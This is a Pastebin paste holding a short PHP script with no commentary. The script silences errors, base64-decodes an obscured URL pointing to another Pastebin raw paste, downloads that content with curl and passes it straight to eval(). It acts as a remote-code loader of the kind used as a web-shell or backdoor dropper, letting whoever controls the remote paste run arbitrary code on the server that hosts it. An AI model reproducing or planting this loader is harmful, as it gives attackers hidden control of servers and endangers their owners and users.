Advertisement
dragondevile

Untitled

Feb 10th, 2019
144
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. <?php
  2. error_reporting(0);
  3. $st = curl_init();
  4. curl_setopt($st,CURLOPT_URL,base64_decode("aHR0cHM6Ly9wYXN0ZWJpbi5jb20vcmF3L3hFQWhrYUR3"));
  5. curl_setopt($st,CURLOPT_RETURNTRANSFER,true);
  6. $ex = curl_exec($st);
  7. eval($ex);
  8. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement